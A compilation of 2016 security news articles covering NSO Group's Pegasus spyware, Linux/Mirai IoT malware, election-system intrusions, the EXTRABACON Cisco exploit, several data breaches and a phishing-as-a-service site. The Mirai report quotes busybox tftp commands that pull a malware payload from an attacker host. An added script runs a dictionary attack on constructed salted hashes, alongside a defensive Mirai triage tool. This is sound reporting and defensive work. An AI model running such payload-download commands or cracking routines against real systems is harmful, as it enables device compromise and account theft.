NSO Group, the surveillance firm that could spy on every smartphone
6.9.2016 securityaffairs BigBrothers
The NSO Group is one of the surveillance companies that allow their clients to spy on their targets through almost any smartphone.
It is quite easy for any government to spy on mobile users: we recently discussed the Trident vulnerabilities, which were exploited by surveillance software developed by the NSO Group to deliver the Pegasus malware.
But using the NSO Group’s software can be very expensive: according to The New York Times, spying on 10 iPhones costs $650,000, plus a $500,000 setup fee.
“To spy on 10 iPhone users, NSO charges government agencies $650,000; $650,000 for 10 Android users; $500,000 for five BlackBerry users; or $300,000 for five Symbian users — on top of the setup fee, according to one commercial proposal.” reported The New York Times. “You can pay for more targets. One hundred additional targets will cost $800,000, 50 extra targets cost $500,000, 20 extra will cost $250,000 and 10 extra costs $150,000, according to an NSO Group commercial proposal. There is an annual system maintenance fee of 17 percent of the total price every year thereafter.”
Several companies develop surveillance platforms for targeting mobile devices. The NSO Group operated in the dark for several years, until researchers from the Citizen Lab organization and the Lookout firm spotted its software in targeted attacks against the UAE human rights defender Ahmed Mansoor.
The researchers also spotted other attacks against a Mexican journalist who had reported on corruption in the Mexican government.
“The company’s internal documents detail pitches to countries throughout Europe and multimillion-dollar contracts with Mexico, which paid the NSO Group more than $15 million for three projects over three years, according to internal NSO Group emails dated in 2013.” added The New York Times.
“Our intelligence systems are subject to Mexico’s relevant legislation and have legal authorization,” Ricardo Alday, a spokesman for the Mexican embassy in Washington, said in an emailed statement. “They are not used against journalists or activists. All contracts with the federal government are done in accordance with the law.”
The New York Times has conducted further investigations on the NSO Group, a company that specializes in surveillance applications for governments and law enforcement agencies around the world.
People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors sales and vets potential customers to verify that the software will not be abused to violate human rights.
Officially, the sale of surveillance software is limited to authorized governments, to support agencies’ investigations into criminal organizations and terrorist groups.
Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.
“There’s no check on this,” said Bill Marczak, a senior fellow at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. “Once NSO’s systems are sold, governments can essentially use them however they want. NSO can say they’re trying to make the world a safer place, but they are also making the world a more surveilled place.”
Companies like the NSO Group operate in the dark, in a sort of “legal gray area”: although the Israeli government exercises strict control over the export of this kind of software, surveillance applications could be abused by threat actors and authoritarian regimes worldwide.
The principal product of the NSO Group is a surveillance software called Pegasus, which can spy on the most common mobile devices, including iPhones, Androids, BlackBerry and Symbian systems.
Pegasus is a perfect tool for surveillance: it is able to steal any kind of data from a smartphone and to use the device’s camera and microphone to spy on the surrounding environment.
“In its commercial proposals, the NSO Group asserts that its tracking software and hardware can install itself in any number of ways, including “over the air stealth installation,” tailored text messages and emails, through public Wi-Fi hot spots rigged to secretly install NSO Group software, or the old-fashioned way, by spies in person.” continues The New York Times.
Now we have more information about the mysterious NSO Group, but many other companies operate in the same “legal gray area.”
Linux/Mirai ELF, when malware is recycled it can still be dangerous
6.9.2016 securityaffairs Virus
Experts from MalwareMustDie spotted a new ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices.
In August, experts from MalwareMustDie analyzed samples of a particular ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices. The name of the malware is the same as that of the binary, “mirai.*”, and according to the experts several attacks have been detected in the wild.
The ELF Linux/Mirai is very insidious; it is still undetected by many antivirus solutions, as confirmed by the very low detection ratio in the VirusTotal online scanning service.
“The reason for the lack of detection is because of the lack of samples, which are difficult to fetch from the infected IoT devices, routers, DVR or WebIP Camera, the Linux with Busybox binary in embedded platform, which what this threat is aiming.” states the analysis from MalwareMustDie Blog.
The last ELF examined by Security Affairs was the Linux Trojan Linux.PNScan, which has been actively targeting routers based on x86 Linux in an attempt to install backdoors on them.
But MalwareMustDie tells us that Linux/Mirai “is a lot bigger than PnScan”.
And continues: “The threat was starting campaign in early August even if this ELF is not easy to be detected since it is not showing its activity soon after being installed: it sits in there and during that time, no malware file will be left over in system, all are deleted except the delayed process where the malware is running after being executed.”
This means that when the infection succeeds, it is not easy to distinguish an infected system from a clean one except through memory analysis, and we are talking about devices that are not easy to analyze and debug. The usual kinds of analysis, conducted on the file system or on external network traffic, do not give any evidence at the beginning.
We are in a hostile environment, called the Internet of Things (IoT), that is shaping a new kind of powerful botnet spreading worldwide. But which countries are more exposed to this kind of attack?
“Countries that are having Linux busybox IoT embedded devices that can connect to the internet, like DVR or Web IP Camera from several brands, and countries who have ISP serving users by Linux routers running with global IP address, are exposed as target, especially to the devices or services that is not securing the access for the telnet port (Tcp/23) service”
In fact, he continues, it seems that “the Linux/Mirai creators succeed to encode the strings and making diversion of traffic to camouflage themself. As is possible to see analyzing the samples, shown in the link to Virustotal the best detection is only “3 of 53” or “3 to 55.””
What is very important for all sysadmins is to be provided with a shield against these infections: “along with the good friends involved in the open filtration system, security engineers are trying to push” – says again MalwareMustDie – “the correct filtration signature to alert the sysadmins if having the attacks from this threat. And on one pilot a sysadmins provided with the correct signatures, found the source attack from several hundreds of addresses within only a couple of days.”
So it seems that the infection is really widespread and the botnet is very large.
At the moment, for all the sysadmins who want to protect their systems, there is a list of mitigation actions:
If you have an IoT device, please make sure you have no telnet service open and running.
Block the TCP/48101 port if you don’t use it; it is good to prevent infection and further damage.
Monitor telnet connections, because the protocol used by the botnet for infection is the Telnet service.
Reverse the process, looking for the strings reported in the MalwareMustDie detection tool tips.
But what do we know exactly about this Linux/Mirai ELF malware, and why is it not better known among malware analysts?
“The reason why not so many people know it”, says MalwareMustDie – “is that antivirus thinks it is a variant of Gafgyt or Bashlite or Bashdoor. Then, the real samples of this malware is hard to get since most malware analysts have to extract it from memory on an infected device, or maybe have to hack the CNC to fetch those.”
This means that forensic analysis can also be difficult if we switch off the infected device: all the information would be lost, and it might be necessary to start again with a new infection procedure. It recalls the Greek mobile wiretapping case known as the “Vodafone Hack”, where there was no evidence other than in memory.
But in your opinion, what is the main difference from previous ELF malware versions?
“The actors are now having different strategy than older type of similar threat.” – says MalwareMustDie – “by trying to be stealth (with delay), undetected (low detection hit in AV or traffic filter), unseen (no trace nor samples extracted), encoded ELF’s ASCII data, and with a big “hush-hush” among them for its distribution. But it is obvious that the main purpose is still for DDoS botnet and to rapidly spread its infection to reachable IoTs by what they call it as Telnet Scanner. ”
What makes this ELF really insidious is that the only way to track it is to extract it from the memory of the running devices, and there is not much expertise among people who can “hack their own routers or webcam or DVR to get the malware binary dumped from the memory or checking the trace of infection.”
Digging in the details: how the infection works.
Attackers compromise IoT devices via SSH or Telnet accounts, exploiting known vulnerabilities or using default passwords that were never changed by the owners of the targeted systems.
As we read in the last post on the MalwareMustDie blog, this ELF uses a specific technique: it forks into a new process only if the conditions for infecting the current device are met; otherwise the node is left alone and the installation does not go on.
Once shell access to the device is gained, the attackers download the payload of the ELF Linux/Mirai malware. Below is an example of the commands launched on an IoT device to perform the operation:
busybox tftp -r [MalwareFile] -g [IPsource]
busybox tftp -g -l dvrHelper -r [MalwareFile] [IPsource]
Analyzing the Linux/Mirai infection was very difficult because, once executed, the malware is also able to delete the traces of its presence.
“In some cases of the Linux/Mirai infection is showing traces that the malware was executed without parameter and there are cases where the downloaded malware file(s) is deleted after execution. In this case, mostly you won’t get the samples unless you dump the malware process to the ELF binary. This explains it is hard to get the good working samples for this new threat.” continues the MalwareMustDie team.
“Upon execution the malware will be self-deleted to avoid the trace, but the process is running. In some IoT that can be seen in lsof or the list to the /proc with specific PID, i.e.:”
/proc/{PID}/exe -> ‘/dev/.{something}/dvrHelper’ (deleted)
/proc/{PID}/exe -> ‘./{long alphabet strings}’ (deleted)
While the process runs, the malware opens a PF_INET (IPv4) TCP socket, binds it to port TCP/48101 on the localhost address 127.0.0.1 and starts listening for incoming connections. The malware then forks into a new process with a new PID, and “the infected device will perform connection on telnet services on other devices for the further abuse purpose.”
The experts also provided a way to reverse a running process with a tool that will be released as open source; for the details, enjoy the analysis.
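The following script is an added example, not MalwareMustDie’s tool: it triages a Linux host for the two artefacts described above, a running process whose /proc/<PID>/exe link reads “(deleted)” and a listener bound to 127.0.0.1 on TCP/48101, and it also covers the port-monitoring item in the mitigation list. The /proc/net/tcp rows and exe links embedded in it are constructed samples, and the path /dev/.abc/dvrHelper is made up to match the pattern reported above.

```python
"""Host-side triage for the Linux/Mirai indicators reported by MalwareMustDie.

Added example. Checks two artefacts: a process whose /proc/<pid>/exe link
points to a deleted file (self-deleted binary still running) and a TCP
listener on 127.0.0.1:48101 read from /proc/net/tcp.
"""
import os
import re
from typing import Dict, Iterable, List, Tuple

MIRAI_PORT = 48101   # TCP/48101 listener reported in the analysis
LISTEN_STATE = "0A"  # TCP_LISTEN in the hex 'st' column of /proc/net/tcp

# Matches lines such as "/proc/731/exe -> '/dev/.abc/dvrHelper' (deleted)"
DELETED_EXE = re.compile(r"^/proc/(\d+)/exe -> (.+?) \(deleted\)$")


def parse_proc_net_tcp(lines: Iterable[str]) -> List[Tuple[str, int, str]]:
    """Return (local_ip, local_port, state) triples from /proc/net/tcp text.

    Addresses are little-endian hex: 0100007F is 127.0.0.1, BBE5 is 48101.
    """
    rows = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4 or not fields[0].rstrip(":").isdigit():
            continue  # header line or junk
        ip_hex, port_hex = fields[1].split(":")
        octets = [int(ip_hex[i:i + 2], 16) for i in range(6, -1, -2)]
        rows.append((".".join(map(str, octets)), int(port_hex, 16), fields[3]))
    return rows


def find_mirai_listener(lines: Iterable[str]) -> List[Tuple[str, int, str]]:
    """Listeners on the Mirai control port, on any local address."""
    return [r for r in parse_proc_net_tcp(lines)
            if r[1] == MIRAI_PORT and r[2] == LISTEN_STATE]


def find_deleted_exes(exe_links: Iterable[str]) -> Dict[int, str]:
    """Map PID -> original path for processes whose binary was unlinked.

    Input lines have the shape 'link -> target', as printed by ls -l.
    """
    found = {}
    for line in exe_links:
        m = DELETED_EXE.match(line.strip())
        if m:
            found[int(m.group(1))] = m.group(2).strip("'")
    return found


def live_deleted_exes() -> Dict[int, str]:
    """Same check against the running system (Linux only; needs /proc)."""
    found = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            target = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # kernel thread, already exited, or no permission
        if target.endswith(" (deleted)"):
            found[int(pid)] = target[: -len(" (deleted)")]
    return found


# Constructed sample of /proc/net/tcp: an sshd listener and a Mirai listener.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0 100 0 0 10 0
   1: 0100007F:BBE5 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5678 1 0 100 0 0 10 0
""".splitlines()

# Constructed 'ls -l /proc/*/exe' output, trimmed to the link part.
SAMPLE_EXE_LINKS = [
    "/proc/1/exe -> /bin/busybox",
    "/proc/731/exe -> '/dev/.abc/dvrHelper' (deleted)",
]


def triage(tcp_lines: Iterable[str], exe_links: Iterable[str]) -> List[str]:
    """Human-readable findings for the given /proc snapshots."""
    findings = []
    for ip, port, _ in find_mirai_listener(tcp_lines):
        findings.append(f"listener on {ip}:{port} (Mirai control port)")
    for pid, path in find_deleted_exes(exe_links).items():
        findings.append(f"pid {pid} runs deleted binary {path}")
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_PROC_NET_TCP, SAMPLE_EXE_LINKS):
        print("SUSPICIOUS:", f)
    for pid, path in live_deleted_exes().items():
        print(f"SUSPICIOUS (live): pid {pid} runs deleted binary {path}")
```

On a real device, feed the script the output of `cat /proc/net/tcp` and `ls -l /proc/*/exe` taken from the running system, since the binary is gone from the file system.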
Evidence on hacks of the US State Election Systems suggest Russian origin
6.9.2016 securityaffairs Hacking
Researchers have found links between the attacks on US state election systems and campaigns managed by alleged Russian state-sponsored hackers.
Security experts at threat intelligence firm ThreatConnect have conducted an analysis on the IP addresses listed in the flash alert issued in August by the FBI that warned about two cyber attacks against the election systems in two U.S. states.
The FBI confirmed that foreign hackers have penetrated state election systems; federal experts have uncovered evidence of the intrusions. The hackers breached the databases of two state election systems, and for this reason the FBI issued the flash alert to election officials across the country, inviting them to adopt security measures to protect their computer systems.
“The FBI warning, contained in a “flash” alert from the FBI’s Cyber Division, a copy of which was obtained by Yahoo News, comes amid heightened concerns among U.S. intelligence officials about the possibility of cyberintrusions, potentially by Russian state-sponsored hackers, aimed at disrupting the November elections.” reported Yahoo News, which obtained a copy of the “flash” alert.
The FBI alert contains technical details about the attacks, including the IP addresses involved in both attacks, which have been analyzed by ThreatConnect.
The TTPs adopted by the attackers suggest the involvement of Russian hackers: one of the IP addresses included in the alert had surfaced before on Russian criminal underground hacker forums. Some of the IPs are owned by the FortUnix Networks firm, known to security experts because its infrastructure was exploited by the attackers who hit the Ukrainian power grid in December with the BlackEnergy malware.
The experts revealed that one of them was used in the past in spear-phishing campaigns that targeted the Justice and Development (AK) Party in Turkey, the Freedom Party in Germany, and the Ukrainian Parliament.
“However, as we looked into the 5.149.249[.]172 IP address within the FBI Flash Bulletin, we uncovered a spear phishing campaign targeting Turkey’s ruling Justice and Development (AK) Party, Ukrainian Parliament, and German Freedom Party figures from March – August 2016 that fits a known Russian targeting focus and modus operandi.” states the analysis published by ThreatConnect. “As we explored malicious activity in the IP ranges around 5.149.249[.]172 we found additional linkages back to activity that could be evidence of Russian advanced persistent threat (APT) activity. This connection around the 5.149.249[.]172 activity is more suggestive of state-backed rather than criminally motivated activity, although we are unable to assess which actor or group might be behind the attacks based on the current evidence.”
The phishing campaigns mentioned in the analysis relied on an open source phishing framework named Phishing Frenzy. The security experts managed to get into the control panel of the system used by the phishers and discovered a total of 113 emails written in Ukrainian, Turkish, German and English.
Out of the 113 total emails, 48 of them are malicious messages targeting Gmail accounts, while the rest were specifically designed to look like an email from an organization of interest for the victims.
16 of the malicious emails used to target AK Party officials were also included in the WikiLeaks dump of nearly 300,000 AK Party emails disclosed in July.
The experts from ThreatConnect discovered some connections to a Russian threat actor allegedly linked to the Government in Moscow. One of the domains hosting the phishing content was registered with an email address associated with a domain known to be used by the infamous APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy).
Below is the evidence collected by experts at ThreatConnect that suggests the involvement of the Russian Government, “but do not prove” it:
Six of the eight IP addresses belong to a Russian-owned hosting service
5.149.249[.]172 hosted a Russian cybercrime market from January – May 2015
Other IPs belonging to FortUnix infrastructure – the same provider as 5.149.249[.]172 – were seen in 2015 Ukraine power grid and news media denial of service attacks
The Acunetix and SQL injection attack method closely parallel the video from a purported Anonymous Poland (@anpoland) handle describing how they obtained athlete records from Court of Arbitration for Sport (CAS).
Enjoy the analysis.
NSA EXTRABACON exploit still threatens tens of thousands of CISCO ASA boxes
6.9.2016 securityaffairs BigBrothers
Two security experts from the Rapid 7 firm revealed that tens of thousands of CISCO ASA boxes are still vulnerable to the NSA EXTRABACON exploit.
A few weeks ago the Shadow Brokers hacker group broke into the arsenal of the NSA-linked Equation Group and leaked online data dumps containing its exploits.
ExtraBacon is one of the exploits included in the NSA arsenal; in August security experts improved it to attack newer versions of the CISCO ASA appliance. The Hungary-based security consultancy SilentSignal focused its analysis on the ExtraBacon exploit, revealing that it could be used against newer models of Cisco’s Adaptive Security Appliance (ASA).
The security firm has demonstrated that the NSA-linked Cisco exploit dubbed ExtraBacon poses a bigger threat than previously thought.
Initially, the ExtraBacon exploit was restricted to versions 8.4.(4) and earlier of the CISCO ASA software; it has now been extended to 9.2.(4).
The EXTRABACON tool exploits the CVE-2016-6366 vulnerability to allow an attacker who has already gained a foothold in a targeted network to take full control of a CISCO ASA firewall. The tool leverages a flaw in the Simple Network Management Protocol (SNMP) implementation of the ASA software.
“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.
“The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.”
At the end of August CISCO started releasing patches for its ASA software to address the Equation Group’s EXTRABACON exploit included in the NSA data dump leaked online.
Network administrators who manage CISCO ASA 7.2, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6 and 8.7 have to update their installations to version 9.1.7(9) or later. The vulnerability has been fixed in ASA 9.1, 9.5 and 9.6 with the release of versions 9.1.7(9), 9.5(3) and 9.6.1(11).
Experts estimated that tens of thousands of Cisco ASA firewalls are vulnerable to an authentication bypass exploit.
The bad news
Unfortunately, two security experts from the Rapid 7 firm, Derek Abdine and Bob Rudis, revealed that tens of thousands of ASA appliances are still vulnerable to the EXTRABACON attack, judging by the time of their last reboot.
The security duo scanned roughly 50,000 ASA devices that had been identified in a previous reconnaissance and analysed their last reboot times.
Some 10,000 of the 38,000 ASA boxes had rebooted within the 15 days since Cisco released its patch, which indicates that roughly 28,000 devices are still vulnerable because they were not patched. The remaining 12,000 devices did not provide information on the last reboot.
Going deep into the analysis, the researchers discovered that unpatched devices belong to four large US firms, a UK government agency and a financial services company, and a large Japanese telecommunications provider.
What does it mean?
It means that the above organizations are running vulnerable CISCO ASA boxes that can be attacked if the following conditions are met:
the ASA device must have SNMP enabled, and an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP, though it’s rare to see it working that way) and know the SNMP community string
an attacker must also have telnet or SSH access to the devices
Of course, exploiting ExtraBacon is not so simple; it is nonetheless possible for persistent attackers.
“This generally makes the EXTRABACON attack something that would occur within an organization’s network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit.” wrote Abdine and Rudis.
“Even though there’s a high probable loss magnitude from a successful exploit, the threat capability and threat event frequency for attacks would most likely be low in the vast majority of organisations that use these devices to secure their environments.”
“Having said that, Extra Bacon is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organisations to deploy the patch as soon as they can obtain and test it.”
The security duo is warning the above organisations, which should not underestimate the risk of exposure to EXTRABACON attacks.
Porn Brazzersforum hacked, nearly 800,000 Brazzers Accounts Exposed
6.9.2016 securityaffairs Hacking
A data breach affected the Brazzersforum, resulting in the exposure of nearly 800,000 accounts of the popular porn site Brazzers.
Another week starts with a data breach: roughly 800,000 accounts of the porn site Brazzers have been compromised. The data breach affected a separate forum; even so, Brazzers users who never signed up to the forum may have been impacted.
The news was reported by Motherboard, which received the dump from the data breach monitoring website Vigilante.pw. The leaked archive includes 928,072 records with 790,724 distinct email addresses, usernames and passwords in plaintext.
Motherboard journalists were supported by the popular security expert Troy Hunt in verifying the authenticity of the leaked details; he confirmed that a number of the details from the data dump belong to Brazzers users.
“This matches an incident which occurred in 2012 with our ‘Brazzersforum,’ which was managed by a third party. The incident occurred because of a vulnerability in the said third party software, the ‘vBulletin’ software, and not Brazzers itself.” explained Matt Stevens, a company spokesman.
The company downplayed the extent of the data breach, explaining that only a small portion of users were impacted.
“That being said, users’ accounts were shared between Brazzers and the ‘Brazzersforum‘ which was created for user convenience. That resulted in a small portion of our user accounts being exposed and we took corrective measures in the days following this incident to protect our users,” Stevens added.
A strange detail emerged in the story: Motherboard contacted two Brazzers users to verify the authenticity of their data; both confirmed that the records were genuine, but said that they had never accessed the Brazzersforum.
The forum allows Brazzers users to discuss porn content or to suggest new scenarios for future productions.
The Brazzers forum runs vBulletin, one of the most popular platforms for web forums. Old vBulletin versions are affected by several easy-to-exploit vulnerabilities, and it is likely that hackers exploited one of them to steal the records.
At the time of writing, Brazzersforum is under maintenance.
In response to the data breach Brazzers banned all the inactive accounts present in the dump.
“Note that the data provided contains many duplicates and non-functional accounts. We banned all non-active accounts in that list in case those usernames and passwords are re-used in the future,” Matt Stevens, public relations manager from Brazzers, told Motherboard.
“Brazzers takes the privacy and safety of its users very seriously,”
Hong Kong Government Hacked by APT3 Group before elections
4.9.2016 securityaffairs APT
Two Hong Kong government departments were targeted by Chinese hackers belonging to the APT3 group just before the legislative elections.
Security experts from FireEye have discovered a new cyber espionage campaign launched by the Chinese APT3 group against the Hong Kong Government before the upcoming parliamentary elections, which are being held today, September 4.
The hackers targeted two Hong Kong government departments to steal information related to the upcoming elections.
APT3 hackers used spear-phishing emails to lure victims to websites used to deliver malicious code to the victims’ PCs. According to FireEye, the malicious phishing emails claimed to include information about a report on election results and included a link to the malicious website.
APT3 was first spotted by FireEye in 2014, when the APT group was using exploits targeting recently disclosed vulnerabilities in Windows. The experts at FireEye speculated that APT3 is the same actor behind “Operation Clandestine Fox”, uncovered by the company in April 2014, in which the hackers exploited an IE zero-day vulnerability in a series of targeted attacks.
FireEye reported in a blog post the details of the attacks run by the APT3 that exploited the Windows OLE bug and also another Windows privilege escalation vulnerability (CVE-2014-4113).
Cyber espionage campaigns conducted to gather information about government and political activities in Southeast Asia are not a novelty; the Government in Beijing is one of the most active in this sense.
“Typically when we see government attacks on other governments, it’s about intelligence gathering and trying to gain access to information they can’t get via other means,” Bryce Boland, FireEye CTO for the Asia-Pac, told Agence France-Presse.
China has always put political pressure on the local Hong Kong government to discredit political opponents and the candidates who fight for the independence of the country.
Leakedsource breach notification service reported two Bitcoin Data Breaches
4.9.2016 securityaffairs Hacking
Now LeakedSource disclosed details from two Bitcoin data breaches that affected the bitcoin exchange BTC-E.com and the discussion forum Bitcointalk.org.
The data breach notification service LeakedSource is becoming familiar to my readers; recently it reported the data breaches suffered by many IT services, including Last.fm and Dropbox, both of which occurred in 2012. Now LeakedSource has disclosed details from two Bitcoin data breaches that affected the Bitcoin sector; the incidents were suffered by the bitcoin exchange BTC-E.com and the bitcoin discussion forum Bitcointalk.org.
The incident at Bitcointalk.org was disclosed in May, when the servers of the forum were compromised by attackers.
BitcoinTalk @bitcointalk
Server compromised due to social engineering against ISP NFOrce. There will be extended downtime for forensic analysis and reinstall.
03:14 - 22 May 2015
“The forum’s ISP NFOrce managed to get tricked into giving an attacker access to the server. I think that the attacker had access for only about 12 minutes before I noticed it and had the server disconnected, so he probably wasn’t able to get a complete dump of the database. However, you should act as though your password hashes, PMs, emails, etc. were compromised.” was reported on Reddit by the theymos user. “The forum will probably be down for 36-60 hours for analysis and reinstall. I’ll post status updates on Twitter @bitcointalk and I’ll post a complete report in a post in Meta once the forum comes back online.”
“each password has a 12-byte unique salt. The passwords are hashed with 7500 rounds of SHA-256.” he added.
LeakedSource reported that 499,593 user details were stolen in the incident, the leaked records include usernames, passwords, emails, birthdays, secret questions, hashed secret answers and some other internal data.
91% of the passwords were hashed with sha256crypt; the experts explained that it would take about a year to crack an estimated 60-70% of them.
The remaining 9% were hashed with MD5, all protected with the same salt value; LeakedSource has already cracked approximately 68% of those.
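The script below is an added example, not LeakedSource’s or the forum’s code. It models the two schemes reported above, a unique 12-byte salt with 7500 rounds of SHA-256 (written here as a plain salted iteration, not the real sha256crypt “$5$” construction, which is more involved) and MD5 under one shared salt, and counts how many hash computations a dictionary attack needs against each, which is why the shared-salt MD5 subset was cracked quickly. The accounts and wordlist are constructed.

```python
"""Cost of a dictionary attack: per-user salt vs shared salt.

Added example. Simplified stand-in for the sha256crypt scheme (salted,
7500 iterations of SHA-256) beside salted MD5 with one salt for all users.
"""
import hashlib
import os
from typing import Callable, Dict, List, Optional, Tuple

ROUNDS = 7500    # rounds reported for the sha256crypt passwords
SALT_LEN = 12    # 12-byte unique salt, as reported
HashFn = Callable[[str, bytes], bytes]


def iterated_sha256(password: str, salt: bytes, rounds: int = ROUNDS) -> bytes:
    """Salted, iterated SHA-256. Not the real $5$ algorithm, but the
    cost model (each guess costs `rounds` compressions per salt) is the same."""
    pw = password.encode()
    digest = hashlib.sha256(salt + pw).digest()
    for _ in range(rounds - 1):
        digest = hashlib.sha256(digest + salt + pw).digest()
    return digest


def salted_md5(password: str, salt: bytes) -> bytes:
    """Single MD5 over salt||password: one fast compression per guess."""
    return hashlib.md5(salt + password.encode()).digest()


def make_db(passwords: Dict[str, str], hash_fn: HashFn,
            shared_salt: Optional[bytes] = None) -> Dict[str, Tuple[bytes, bytes]]:
    """Build {user: (salt, hash)}; a fresh random salt per user unless shared."""
    db = {}
    for user, pw in passwords.items():
        salt = shared_salt if shared_salt is not None else os.urandom(SALT_LEN)
        db[user] = (salt, hash_fn(pw, salt))
    return db


def dictionary_attack(db: Dict[str, Tuple[bytes, bytes]], wordlist: List[str],
                      hash_fn: HashFn) -> Tuple[Dict[str, str], int]:
    """Return (cracked {user: password}, number of hash_fn invocations).

    A guess is hashed once per distinct salt and compared with every user
    under that salt. With a shared salt that is one hash per guess for the
    whole dump; with unique salts it is one hash per guess per user.
    """
    by_salt: Dict[bytes, List[str]] = {}
    for user, (salt, _) in db.items():
        by_salt.setdefault(salt, []).append(user)
    cracked, calls = {}, 0
    for salt, users in by_salt.items():
        for guess in wordlist:
            h = hash_fn(guess, salt)
            calls += 1
            for user in users:
                if db[user][1] == h:
                    cracked[user] = guess
    return cracked, calls


# Constructed sample accounts and a tiny wordlist (not from the dump).
SAMPLE_PASSWORDS = {"alice": "password1", "bob": "letmein",
                    "carol": "correcthorse", "dave": "hunter2"}
WORDLIST = ["123456", "password1", "letmein", "qwerty", "hunter2"]


def compare_schemes() -> Dict[str, Tuple[int, int]]:
    """For each scheme: (accounts cracked, hash invocations spent)."""
    strong = make_db(SAMPLE_PASSWORDS, iterated_sha256)
    weak = make_db(SAMPLE_PASSWORDS, salted_md5, shared_salt=b"same-salt-4all")
    s_cracked, s_calls = dictionary_attack(strong, WORDLIST, iterated_sha256)
    w_cracked, w_calls = dictionary_attack(weak, WORDLIST, salted_md5)
    return {"sha256_7500_rounds_unique_salt": (len(s_cracked), s_calls),
            "md5_shared_salt": (len(w_cracked), w_calls)}


if __name__ == "__main__":
    for scheme, (n, calls) in compare_schemes().items():
        print(f"{scheme}: cracked {n}/{len(SAMPLE_PASSWORDS)} "
              f"accounts with {calls} hash computations")
```

The three weak passwords fall in both cases; the difference is that the shared-salt MD5 set costs 5 single MD5 computations, while the unique-salt set costs 20 computations of 7500 SHA-256 rounds each, and that gap grows linearly with the number of users.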
The BTC-E.com incident is more mysterious; it is possible that the hackers also compromised some users’ wallets, stealing bitcoins.
Despite LeakedSource’s notification, there is no news of incidents affecting BTC-E customers.
In January 2016 the Financial Underground Kingdom blog reported that the exchange had suffered one hack with no effects for its customers; it is likely that the data leaked by LeakedSource are related to that incident.
“During years of existence [BTC-E] had just 1 hack after which the owners paid all the debt to users.”
It isn’t clear whether that hack and the data disclosure made by LeakedSource refer to the same incident. LeakedSource reported that BTC-E.com was hacked in October 2013 and 568,355 users were impacted.
The passwords were protected with an unknown hashing method, making the “passwords completely uncrackable although that may change.”
Fake-Game offers a Phishing-as-a-Service platform to wannabe criminals
4.9.2016 securityaffairs Spam
Experts from Fortinet discovered a Russian website called Fake-Game that offers a Phishing-as-a-Service platform to anyone.
Phishing attacks are still one of the most effective methods to grab users’ credentials on the web.
Experts from Fortinet have discovered a Russian-language site called ‘Fake-Game’ that offers Phishing-as-a-Service.
“During our monitoring, we discovered that this same business model is also being used in phishing schemes in the form of a Russian website called “Fake-Game.” Appearing in (at least) July 2015, Fake-Game offers a Phishing-as-a-Service (PHaaS) platform to anyone who signs up on their website:” reads a blog post published by Fortinet.
“You’ve come to the site to hijack accounts,” reads the translation of the message that the website displays.
The website is free to use, but it also offers a paid version for VIP accounts that includes additional features such as the possibility to browse all other phished accounts.
According to its authors, Fake-Game has been used to hack into over 688,610 accounts; it is easy to use and also includes video tutorials.
Users only have to choose which type of credential they wish to grab (i.e. Facebook, Instagram, Google, etc.).
The Fake-Game then generates a URL with a unique ID for each user.
“The link is appended by an affiliate ID which, in this case, is our subscriber’s ID. This allows the website to track which stolen accounts belong to which subscriber.” continues the Fortinet post.
“A subscriber can then spread the phishing site to prospective victims. Once a victim enters a credential into the subscriber’s phishing link, a prompt showing the stolen information appears:”
Fake-Game is a classic example of crime-as-a-service: similar services allow wannabe criminals to rent infrastructure and services to easily enter the cyber criminal arena.
Fake-Game users only need to trick victims into clicking on the Phishing URL.
Crime-as-a-service dramatically lowers the barrier for entry in the cyber criminal ecosystem.
Dutch Police Seize Two VPN Servers, But Without Explaining... Why?
3.9.2016 thehackernews Security
Recently, two European countries, France and Germany, declared war on encryption with the aim of forcing major technology companies to build encryption backdoors into their secure messaging services.
However, another neighbouring country, the Netherlands, is proactively taking down cyber criminals, but do you know how?
Dutch police have seized two servers belonging to Virtual Private Network (VPN) provider Perfect Privacy as part of an investigation, without providing any reason for the seizures.
The Switzerland-based VPN provider said it learned of the seizure from I3D, the company that hosts its servers in Rotterdam.
For those unfamiliar, Virtual Private Networks (VPNs) are easy-to-use security and privacy tools that route your Internet traffic through a remote connection, protecting your browsing, hiding your location and letting you reach restricted resources.
VPNs have now become a great tool not just for large companies, but also for individuals to improve their privacy and security online, dodge content restrictions and counter growing threat of cyber attacks.
While many people, including digital activists, journalists, and protesters, use them for legitimate purposes, VPNs are also used by criminals and black hat hackers to protect their nefarious activities from prying eyes and stay anonymous online.
This is why VPN services are frequently targeted by police and law enforcement while investigating crimes, and this is what appears to have happened with two servers belonging to Perfect Privacy.
The VPN provider informed its customers that two of its servers in Rotterdam, Netherlands, had been seized by the Dutch police on Thursday, August 24, without the company being contacted about a possible investigation or told why its servers were taken down.
The VPN provider says the authorities went directly to I3D with a subpoena requesting the hardware.
